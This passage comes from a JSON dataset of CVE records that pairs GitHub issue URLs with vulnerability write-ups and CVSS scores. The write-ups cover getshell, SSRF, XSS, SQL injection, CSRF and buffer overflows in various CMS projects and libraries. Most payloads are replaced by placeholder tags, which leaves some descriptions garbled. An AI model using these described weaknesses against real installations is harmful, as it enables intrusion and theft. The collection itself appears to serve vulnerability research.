  51641. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/66",
  51642. "Repo_new": "idreamsoft/iCMS",
  51643. "Issue_Created_At": "2019-06-03T09:54:00Z",
  51644. "description": "ICMS install Getshell. ICMS install Getshell Vulnerability location\uff1a$db_name parameter in \\icms NUMBERTAG FILETAG . Cause: the $db_name parameter is written directly to FILETAG without filtering CODETAG attack: FILETAG FILETAG Then request: FILETAG",
  51645. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  51646. "severity": "CRITICAL",
  51647. "baseScore": 9.8,
  51648. "impactScore": 5.9,
  51649. "exploitabilityScore": 3.9
  51650. },
  51651. {
  51652. "CVE_ID": "CVE-2020-19547",
  51653. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/19",
  51654. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/19",
  51655. "Repo_new": "popojicms/popojicms",
  51656. "Issue_Created_At": "2019-06-05T07:08:34Z",
  51657. "description": "Any file read in the background. FILETAG FILETAG",
  51658. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  51659. "severity": "MEDIUM",
  51660. "baseScore": 6.5,
  51661. "impactScore": 3.6,
  51662. "exploitabilityScore": 2.8
  51663. },
  51664. {
  51665. "CVE_ID": "CVE-2020-19551",
  51666. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/177",
  51667. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/177",
  51668. "Repo_new": "wuzhicms/wuzhicms",
  51669. "Issue_Created_At": "2019-06-04T09:56:39Z",
  51670. "description": "Remote Code Execution Vulnerability in WUZHI CMS NUMBERTAG Remote Code Execution Vulnerability in WUZHI CMS NUMBERTAG File extension blacklist bypass during file upload can cause arbitrary code execution. Detail: FILETAG sysorem.li APITAG",
  51671. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  51672. "severity": "HIGH",
  51673. "baseScore": 8.8,
  51674. "impactScore": 5.9,
  51675. "exploitabilityScore": 2.8
  51676. },
  51677. {
  51678. "CVE_ID": "CVE-2020-19553",
  51679. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/179",
  51680. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/179",
  51681. "Repo_new": "wuzhicms/wuzhicms",
  51682. "Issue_Created_At": "2019-06-05T08:56:04Z",
  51683. "description": "Stored Cross Scripting Vulnerability Vulnerability in WUZHI CMS APITAG Stored Cross Scripting Vulnerability Vulnerability in WUZHI CMS NUMBERTAG attacker can upload the specific file to the server & it can cause javascript code execution when visited. View Detail APITAG Stored Cross Scripting APITAG hiboy APITAG",
  51684. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51685. "severity": "MEDIUM",
  51686. "baseScore": 5.4,
  51687. "impactScore": 2.7,
  51688. "exploitabilityScore": 2.3
  51689. },
  51690. {
  51691. "CVE_ID": "CVE-2020-19613",
  51692. "Issue_Url_old": "https://github.com/sunkaifei/FlyCms/issues/1",
  51693. "Issue_Url_new": "https://github.com/sunkaifei/flycms/issues/1",
  51694. "Repo_new": "sunkaifei/flycms",
  51695. "Issue_Created_At": "2019-06-12T09:54:51Z",
  51696. "description": "There is an SSRF vulnerability. An issue was discovered in APITAG There is a security vulnerability in file APITAG , in the APITAG function, resulting in SSRF. SSRF \u00ad Server Side Request Forgery attacks. The ability to create requests from the vulnerable server to intra/internet. POC APITAG The request is sent as follows\uff1a CODETAG FILETAG We can see that it will call APITAG to fetch a remote image when adding a question. FILETAG In function APITAG one can use APITAG to bypass reg or request another url directly\uff0cand APITAG is called here. FILETAG Finally APITAG results in SSRF. FILETAG Still in APITAG we can find the file path, file APITAG APITAG finally failed, but the file will be created. The file path is today's date, example APITAG The file name is concat md5(date + filenum) + filenum + extension FILETAG md NUMBERTAG result is NUMBERTAG of md NUMBERTAG result. FILETAG And we can get the server time from the response; after converting the timezone, we can calculate the result. FILETAG so the filename is APITAG \uff0cthe absolute path is APITAG Requesting the path, we can download the file named APITAG . FILETAG It's the SSRF result.",
  51697. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  51698. "severity": "HIGH",
  51699. "baseScore": 7.5,
  51700. "impactScore": 3.6,
  51701. "exploitabilityScore": 3.9
  51702. },
  51703. {
  51704. "CVE_ID": "CVE-2020-19616",
  51705. "Issue_Url_old": "https://github.com/langhsu/mblog/issues/27",
  51706. "Issue_Url_new": "https://github.com/langhsu/mblog/issues/27",
  51707. "Repo_new": "langhsu/mblog",
  51708. "Issue_Created_At": "2019-06-14T03:01:27Z",
  51709. "description": "There are two stored XSS vulnerability. A xss vulnerability was discovered in mblog. In mblog NUMBERTAG stored XSS exists via the APITAG value parameter, which allows remote attackers to inject arbitrary web script or HTML. poc ERRORTAG FILETAG FILETAG Another stored XSS exists via the APITAG value parameter, which allows remote attackers to inject arbitrary web script or HTML. poc ERRORTAG FILETAG FILETAG FILETAG",
  51710. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51711. "severity": "MEDIUM",
  51712. "baseScore": 5.4,
  51713. "impactScore": 2.7,
  51714. "exploitabilityScore": 2.3
  51715. },
  51716. {
  51717. "CVE_ID": "CVE-2020-19625",
  51718. "Issue_Url_old": "https://github.com/oria/gridx/issues/433",
  51719. "Issue_Url_new": "https://github.com/oria/gridx/issues/433",
  51720. "Repo_new": "oria/gridx",
  51721. "Issue_Created_At": "2019-06-14T01:51:59Z",
  51722. "description": "Remote Code Execution Vulnerability in gridx latest version. hi, We found a remote code execution vulnerability in gridx latest version that could allow an attacker to remotely execute arbitrary code to attack an attack server. FILETAG code line in NUMBERTAG The query parameter is directly brought into the eval function. payload: URLTAG This payload execution APITAG FILETAG fix: In php, the eval function is dangerous. It is not recommended to use it. If you must use it, you need to limit the incoming data.",
  51723. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  51724. "severity": "CRITICAL",
  51725. "baseScore": 9.8,
  51726. "impactScore": 5.9,
  51727. "exploitabilityScore": 3.9
  51728. },
  51729. {
  51730. "CVE_ID": "CVE-2020-19667",
  51731. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1895",
  51732. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1895",
  51733. "Repo_new": "imagemagick/imagemagick",
  51734. "Issue_Created_At": "2020-04-14T10:46:31Z",
  51735. "description": "stack buffer overflow at APITAG in APITAG Prerequisites \u2705 ] I have written a descriptive issue title [ \u2705] I have verified that I am using the latest version of APITAG [ \u2705] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description There's a stack buffer overflow at APITAG in APITAG poc URLTAG Steps to Reproduce run_cmd APITAG Here's ASAN log. ERRORTAG System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): zlib Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Additional information: ERRORTAG edit by peanuts , and Is it possible to request a cve id\uff1f APITAG",
  51736. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  51737. "severity": "HIGH",
  51738. "baseScore": 7.8,
  51739. "impactScore": 5.9,
  51740. "exploitabilityScore": 1.8
  51741. },
  51742. {
  51743. "CVE_ID": "CVE-2020-19668",
  51744. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/136",
  51745. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/136",
  51746. "Repo_new": "saitoha/libsixel",
  51747. "Issue_Created_At": "2020-04-15T10:14:08Z",
  51748. "description": "Unverified indexs into the array lead to out of bound access in APITAG run_cmd APITAG poc URLTAG the asan log ERRORTAG analyse : I use the gdb to debug the bug. I found in the APITAG ,the APITAG is larger than the structure of g which define as NUMBERTAG so the crash occur\uff01 source code is here: ERRORTAG bug position: ERRORTAG gdb log \uff1a ERRORTAG version: CODETAG complies command APITAG",
  51749. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51750. "severity": "MEDIUM",
  51751. "baseScore": 6.5,
  51752. "impactScore": 3.6,
  51753. "exploitabilityScore": 2.8
  51754. },
  51755. {
  51756. "CVE_ID": "CVE-2020-19669",
  51757. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/4",
  51758. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/4",
  51759. "Repo_new": "weng-xianhu/eyoucms",
  51760. "Issue_Created_At": "2019-06-27T04:58:55Z",
  51761. "description": "There is a CSRF vulnerability that can add an admin account. There is one CSRF vulnerability that can add the administrator account An issue was discovered in Eyoucms NUMBERTAG There is a CSRF vulnerability that can add an admin account via APITAG After the admin logged in, open the csrf exp page. ERRORTAG The poc request message: FILETAG After open the csrf exp page, add the hacker5 admin account. FILETAG",
  51762. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  51763. "severity": "HIGH",
  51764. "baseScore": 8.8,
  51765. "impactScore": 5.9,
  51766. "exploitabilityScore": 2.8
  51767. },
  51768. {
  51769. "CVE_ID": "CVE-2020-19676",
  51770. "Issue_Url_old": "https://github.com/alibaba/nacos/issues/2284",
  51771. "Issue_Url_new": "https://github.com/alibaba/nacos/issues/2284",
  51772. "Repo_new": "alibaba/nacos",
  51773. "Issue_Created_At": "2020-01-10T07:17:08Z",
  51774. "description": "Incorrect Access Control. Issue Description There is an Incorrect Access Control in NACOS NUMBERTAG Describe what happened (or what feature you want) Visitors can get service details when not logged in. FILETAG FILETAG Describe what you expected to happen I expect it can be fixed. How to reproduce it (as minimally and precisely as possible NUMBERTAG We can set up an environment locally to get the service details interface. FILETAG NUMBERTAG Then get other nacos service names through the service list interface. FILETAG NUMBERTAG Finally we can get service details when not logged in. FILETAG Tell us your environment NACOS NUMBERTAG Anything else we need to know?",
  51775. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  51776. "severity": "MEDIUM",
  51777. "baseScore": 5.3,
  51778. "impactScore": 1.4,
  51779. "exploitabilityScore": 3.9
  51780. },
  51781. {
  51782. "CVE_ID": "CVE-2020-19676",
  51783. "Issue_Url_old": "https://github.com/alibaba/nacos/issues/1105",
  51784. "Issue_Url_new": "https://github.com/alibaba/nacos/issues/1105",
  51785. "Repo_new": "alibaba/nacos",
  51786. "Issue_Created_At": "2019-04-24T09:55:32Z",
  51787. "description": "Access control of resource in Nacos. APITAG Issue Description Type: feature request Describe what happened (or what feature you want) Access control is numerously required by the community, which is helpful to isolate the resources between different users in production environment. Describe what you expected to happen Different users can be assigned different levels of access privileges for the resources in Nacos, such as service, configuration. How to reproduce it (as minimally and precisely as possible) Tell us your environment Anything else we need to know?",
  51788. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  51789. "severity": "MEDIUM",
  51790. "baseScore": 5.3,
  51791. "impactScore": 1.4,
  51792. "exploitabilityScore": 3.9
  51793. },
  51794. {
  51795. "CVE_ID": "CVE-2020-19703",
  51796. "Issue_Url_old": "https://github.com/zyx0814/dzzoffice/issues/107",
  51797. "Issue_Url_new": "https://github.com/zyx0814/dzzoffice/issues/107",
  51798. "Repo_new": "zyx0814/dzzoffice",
  51799. "Issue_Created_At": "2019-07-04T03:59:12Z",
  51800. "description": "Cross site scripting vulnerability exists in Dzzoffice. Cross site scripting vulnerability exists in Dzzoffice POST FILETAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG APITAG APITAG pWKa NUMBERTAG sendmail NUMBERTAG Upgrade Insecure Requests NUMBERTAG APITAG There is a cross site scripting attack on the referer parameter Insert payload NUMBERTAG balert NUMBERTAG f NUMBERTAG f NUMBERTAG in the parameter,As shown below: FILETAG Can be successfully executed",
  51801. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  51802. "severity": "MEDIUM",
  51803. "baseScore": 6.1,
  51804. "impactScore": 2.7,
  51805. "exploitabilityScore": 2.8
  51806. },
  51807. {
  51808. "CVE_ID": "CVE-2020-19704",
  51809. "Issue_Url_old": "https://github.com/sail-y/spring-boot-admin/issues/7",
  51810. "Issue_Url_new": "https://github.com/sail-y/spring-boot-admin/issues/7",
  51811. "Repo_new": "sail-y/spring-boot-admin",
  51812. "Issue_Created_At": "2019-07-11T03:44:14Z",
  51813. "description": "There is a stored xss vulnerability via APITAG the controller APITAG exist xss vulnerability FILETAG FILETAG FILETAG",
  51814. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51815. "severity": "MEDIUM",
  51816. "baseScore": 5.4,
  51817. "impactScore": 2.7,
  51818. "exploitabilityScore": 2.3
  51819. },
  51820. {
  51821. "CVE_ID": "CVE-2020-19705",
  51822. "Issue_Url_old": "https://github.com/jorycn/thinkphp-zcms/issues/2",
  51823. "Issue_Url_new": "https://github.com/jorycn/thinkphp-zcms/issues/2",
  51824. "Repo_new": "jorycn/thinkphp-zcms",
  51825. "Issue_Created_At": "2019-07-15T15:36:08Z",
  51826. "description": "There is a sql injection vulnerability via APITAG FILETAG use time based bind injection to prove the vulnerability FILETAG",
  51827. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  51828. "severity": "CRITICAL",
  51829. "baseScore": 9.8,
  51830. "impactScore": 5.9,
  51831. "exploitabilityScore": 3.9
  51832. },
  51833. {
  51834. "CVE_ID": "CVE-2020-19709",
  51835. "Issue_Url_old": "https://github.com/liufee/feehicms/issues/2",
  51836. "Issue_Url_new": "https://github.com/liufee/feehicms/issues/2",
  51837. "Repo_new": "liufee/feehicms",
  51838. "Issue_Created_At": "2019-07-31T08:24:11Z",
  51839. "description": "Cross site scripting vulnerability exists in Feehicms. Due to the lax filtering of tag parameters, JS code can be inserted to cause cross site scripting attacks.If the tag parameter is assigned to \" APITAG alert NUMBERTAG APITAG APITAG in get mode can cause cross site script attack. FILETAG The exp code is as follows\uff1a URLTAG APITAG",
  51840. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  51841. "severity": "MEDIUM",
  51842. "baseScore": 6.1,
  51843. "impactScore": 2.7,
  51844. "exploitabilityScore": 2.8
  51845. },
  51846. {
  51847. "CVE_ID": "CVE-2020-19716",
  51848. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/980",
  51849. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/980",
  51850. "Repo_new": "exiv2/exiv2",
  51851. "Issue_Created_At": "2019-08-09T08:46:00Z",
  51852. "description": "Buffer overflow caused by exhaustive memory usage . There is a buffer overflow in exi NUMBERTAG in file APITAG Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial gcc NUMBERTAG The compile command is: cmake ./ ;make To reproduce the issue, run: ./exi NUMBERTAG input Here is the trace reported by asan NUMBERTAG faff NUMBERTAG ba NUMBERTAG PATHTAG NUMBERTAG faff NUMBERTAG bf5e3 in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG faff NUMBERTAG PATHTAG NUMBERTAG faff NUMBERTAG bd NUMBERTAG PATHTAG NUMBERTAG faff NUMBERTAG cb4d ( PATHTAG NUMBERTAG faff NUMBERTAG b NUMBERTAG e in operator new FILETAG The attachment is the poc input. FILETAG",
  51853. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51854. "severity": "MEDIUM",
  51855. "baseScore": 6.5,
  51856. "impactScore": 3.6,
  51857. "exploitabilityScore": 2.8
  51858. },
  51859. {
  51860. "CVE_ID": "CVE-2020-19717",
  51861. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/416",
  51862. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/416",
  51863. "Repo_new": "axiomatic-systems/bento4",
  51864. "Issue_Created_At": "2019-08-09T14:02:54Z",
  51865. "description": "Null pointer dereference caused by unhandled exhaustive memory usage. There is a null pointer dereference caused by unhandled exhaustive memory usage in APITAG Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial gcc NUMBERTAG To reproduce the bug, compile the project with flag DCMAKE_C_FLAGS= g m NUMBERTAG fsanitize=address,undefined then run: ./mp NUMBERTAG aac input /dev/null The reason is that the malloc size does not check and easily lead to memory allocation failure. FILETAG FILETAG Here is the trace reported by ASAN NUMBERTAG WARNING: APITAG failed to allocate NUMBERTAG ffe1fff1 bytes APITAG allocator is terminating the process instead of returning NUMBERTAG If you don't like this behavior set allocator_may_return_null NUMBERTAG APITAG CHECK failed: PATHTAG NUMBERTAG f NUMBERTAG fe NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG f NUMBERTAG b ( PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG f6e NUMBERTAG in operator new FILETAG",
  51866. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51867. "severity": "MEDIUM",
  51868. "baseScore": 6.5,
  51869. "impactScore": 3.6,
  51870. "exploitabilityScore": 2.8
  51871. },
  51872. {
  51873. "CVE_ID": "CVE-2020-19718",
  51874. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/417",
  51875. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/417",
  51876. "Repo_new": "axiomatic-systems/bento4",
  51877. "Issue_Created_At": "2019-08-09T14:25:13Z",
  51878. "description": "Null pointer dereference bug. There is a null pointer dereference bug running mp NUMBERTAG aac. It is similar to NUMBERTAG Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial gcc NUMBERTAG To reproduce the bug, compile the project with flag DCMAKE_C_FLAGS= g m NUMBERTAG fsanitize=address,undefined then run: ./mp NUMBERTAG aac input /dev/null The reason for this problem is due to the mishandled memory allocation: FILETAG Here is the trace reported by ASAN: PATHTAG runtime error: null pointer passed as argument NUMBERTAG which is declared to never be null PATHTAG runtime error: null pointer passed as argument NUMBERTAG which is declared to never be null NUMBERTAG WARNING: APITAG failed to allocate NUMBERTAG fffffff8 bytes APITAG allocator is terminating the process instead of returning NUMBERTAG If you don't like this behavior set allocator_may_return_null NUMBERTAG APITAG CHECK failed: PATHTAG NUMBERTAG f NUMBERTAG aa NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG afa NUMBERTAG in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG f NUMBERTAG b ( PATHTAG NUMBERTAG f NUMBERTAG ade NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG a2e NUMBERTAG in operator new FILETAG",
  51879. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51880. "severity": "MEDIUM",
  51881. "baseScore": 6.5,
  51882. "impactScore": 3.6,
  51883. "exploitabilityScore": 2.8
  51884. },
  51885. {
  51886. "CVE_ID": "CVE-2020-19719",
  51887. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/414",
  51888. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/414",
  51889. "Repo_new": "axiomatic-systems/bento4",
  51890. "Issue_Created_At": "2019-08-09T12:45:59Z",
  51891. "description": "Buffer overflow in APITAG There is a buffer overflow in APITAG related to APITAG Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial gcc NUMBERTAG To reproduce the bug, compile the project with flag ERRORTAG then run: APITAG This is the trace reported by ASAN NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f4b NUMBERTAG b NUMBERTAG at pc NUMBERTAG bc1e3 bp NUMBERTAG ff8c NUMBERTAG b8 sp NUMBERTAG ff8c NUMBERTAG a8 WRITE of size NUMBERTAG at NUMBERTAG f4b NUMBERTAG b NUMBERTAG thread T NUMBERTAG bc1e2 in APITAG const&) PATHTAG NUMBERTAG bc1e2 in APITAG int, unsigned char, unsigned int, APITAG PATHTAG NUMBERTAG bccb5 in APITAG int, APITAG PATHTAG NUMBERTAG e1ccc in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG ca3 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG b6bae in APITAG APITAG unsigned long long) PATHTAG NUMBERTAG b6bae in APITAG int, unsigned long long, bool, APITAG APITAG PATHTAG NUMBERTAG be NUMBERTAG in APITAG int, unsigned long long, bool, bool, APITAG APITAG PATHTAG NUMBERTAG dc NUMBERTAG in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG ca3 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG b6bae in APITAG APITAG unsigned long long) PATHTAG NUMBERTAG b6bae in APITAG int, unsigned long long, bool, APITAG APITAG PATHTAG NUMBERTAG b in APITAG int, APITAG APITAG PATHTAG NUMBERTAG da NUMBERTAG in APITAG int, APITAG APITAG PATHTAG NUMBERTAG da NUMBERTAG in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG ca3 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG b6bae in APITAG APITAG unsigned long long) PATHTAG NUMBERTAG b6bae in APITAG int, unsigned long long, bool, APITAG APITAG PATHTAG NUMBERTAG a NUMBERTAG in APITAG int, APITAG APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG int, APITAG APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG unsigned int, 
unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG fa1f7 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG fa1f7 in APITAG APITAG &) PATHTAG NUMBERTAG a NUMBERTAG in APITAG APITAG bool) PATHTAG NUMBERTAG a NUMBERTAG in APITAG bool) PATHTAG NUMBERTAG ce7 in main PATHTAG NUMBERTAG f6a6d NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG df1b ( PATHTAG NUMBERTAG f4b NUMBERTAG b NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG Here is the Poc input: FILETAG",
  51892. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51893. "severity": "MEDIUM",
  51894. "baseScore": 6.5,
  51895. "impactScore": 3.6,
  51896. "exploitabilityScore": 2.8
  51897. },
  51898. {
  51899. "CVE_ID": "CVE-2020-19720",
  51900. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/413",
  51901. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/413",
  51902. "Repo_new": "axiomatic-systems/bento4",
  51903. "Issue_Created_At": "2019-08-09T12:23:30Z",
  51904. "description": "Exhaustive memory usage . There is a buffer overflow inside APITAG of APITAG It is similar to NUMBERTAG and NUMBERTAG mp NUMBERTAG aac input_file /dev/null In file PATHTAG APITAG allocates a new buffer to parse the atom in the stream. The unhandled memory allocation failure causes the read content memcpy to a null pointer. This is the start points. FILETAG In file In file PATHTAG FILETAG APITAG is the macro define of memcpy and the path formed. Asan trace report NUMBERTAG WARNING: APITAG failed to allocate NUMBERTAG ff7efffd bytes APITAG allocator is terminating the process instead of returning NUMBERTAG If you don't like this behavior set allocator_may_return_null NUMBERTAG APITAG CHECK failed: PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG fa NUMBERTAG in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG b ( PATHTAG NUMBERTAG f NUMBERTAG de NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG in operator new FILETAG",
  51905. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51906. "severity": "MEDIUM",
  51907. "baseScore": 6.5,
  51908. "impactScore": 3.6,
  51909. "exploitabilityScore": 2.8
  51910. },
  51911. {
  51912. "CVE_ID": "CVE-2020-19721",
  51913. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/415",
  51914. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/415",
  51915. "Repo_new": "axiomatic-systems/bento4",
  51916. "Issue_Created_At": "2019-08-09T13:50:32Z",
  51917. "description": "Heap buffer overflow in APITAG when running mp NUMBERTAG aac. There is a heap buffer overflow in APITAG when running mp NUMBERTAG aac. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial gcc NUMBERTAG To reproduce the bug, compile the project with flag ' DCMAKE_C_FLAGS= g m NUMBERTAG fsanitize=address,undefined' then run: './mp NUMBERTAG aac input /dev/null NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f NUMBERTAG b NUMBERTAG at pc NUMBERTAG eb6d5 bp NUMBERTAG ffef NUMBERTAG d8 sp NUMBERTAG ffef NUMBERTAG c8 WRITE of size NUMBERTAG at NUMBERTAG f NUMBERTAG b NUMBERTAG thread T NUMBERTAG eb6d4 in APITAG int) PATHTAG NUMBERTAG d7d9b in APITAG int, unsigned char, unsigned int, APITAG PATHTAG NUMBERTAG dde NUMBERTAG in APITAG int, APITAG PATHTAG NUMBERTAG dd3b4 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG ca3 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG b6bae in APITAG APITAG unsigned long long) PATHTAG NUMBERTAG b6bae in APITAG int, unsigned long long, bool, APITAG APITAG PATHTAG NUMBERTAG a NUMBERTAG in APITAG int, APITAG APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG int, APITAG APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG fa1f7 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG fa1f7 in APITAG APITAG &) PATHTAG NUMBERTAG a NUMBERTAG in APITAG APITAG bool) PATHTAG NUMBERTAG a NUMBERTAG in APITAG bool) PATHTAG NUMBERTAG ce7 in main PATHTAG NUMBERTAG f6a NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG df1b ( PATHTAG NUMBERTAG f NUMBERTAG b NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG",
  51918. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51919. "severity": "MEDIUM",
  51920. "baseScore": 6.5,
  51921. "impactScore": 3.6,
  51922. "exploitabilityScore": 2.8
  51923. },
  51924. {
  51925. "CVE_ID": "CVE-2020-19722",
  51926. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/418",
  51927. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/418",
  51928. "Repo_new": "axiomatic-systems/bento4",
  51929. "Issue_Created_At": "2019-08-09T14:41:05Z",
  51930. "description": "buffer overflow in APITAG There is a buffer overflow in APITAG related to APITAG Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial gcc NUMBERTAG To reproduce the bug, compile the project with flag DCMAKE_C_FLAGS= g m NUMBERTAG fsanitize=address,undefined then run: ./mp NUMBERTAG aac input /dev/null The occur location in the function APITAG PATHTAG FILETAG Here is the trace reported by ASAN NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f NUMBERTAG cf at pc NUMBERTAG d6d NUMBERTAG bp NUMBERTAG ffe NUMBERTAG ac8 sp NUMBERTAG ffe NUMBERTAG ab8 WRITE of size NUMBERTAG at NUMBERTAG f NUMBERTAG cf thread T NUMBERTAG d6d NUMBERTAG in APITAG int, unsigned long long, APITAG PATHTAG NUMBERTAG ccfbb in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG fa1f7 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG fa1f7 in APITAG APITAG &) PATHTAG NUMBERTAG a NUMBERTAG in APITAG APITAG bool) PATHTAG NUMBERTAG a NUMBERTAG in APITAG bool) PATHTAG NUMBERTAG ce7 in main PATHTAG NUMBERTAG f6a NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG df1b ( PATHTAG NUMBERTAG f NUMBERTAG cf is located NUMBERTAG bytes to the left of NUMBERTAG byte region FILETAG",
  51931. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51932. "severity": "MEDIUM",
  51933. "baseScore": 6.5,
